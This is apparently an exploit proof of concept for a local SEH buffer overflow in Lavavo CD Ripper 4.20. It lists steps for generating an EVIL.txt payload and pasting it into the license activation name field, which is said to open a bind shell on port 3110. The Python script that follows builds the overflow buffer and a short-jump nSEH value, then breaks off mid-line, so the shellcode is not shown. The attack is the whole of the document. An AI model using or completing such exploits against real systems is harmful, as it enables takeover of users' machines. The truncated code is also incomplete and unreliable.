# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit # Date: 25.04.2019 # Vendor Homepage:https://www.lavavosoftware.com # Software Link: https://lavavo-cd-ripper.jaleco.com/download # Exploit Author: Achilles # Tested Version: 4.20 # Tested on: Windows XP SP3 EN # Windows 7 Sp1 x64 # 1.- Run python code : Lavavo.py # 2.- Open EVIL.txt and copy content to Clipboard # 3.- Open LavavoCDRipper.exe and click UNLOCK. # 4.- Paste the Content of EVIL.txt into the 'License Activation Name' # 5.- License Key 123456789 # 6.- Click 'Unlock Now' and you will have a bind shell port 3110. #!/usr/bin/env python import struct buffer = "\x41" * 300 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('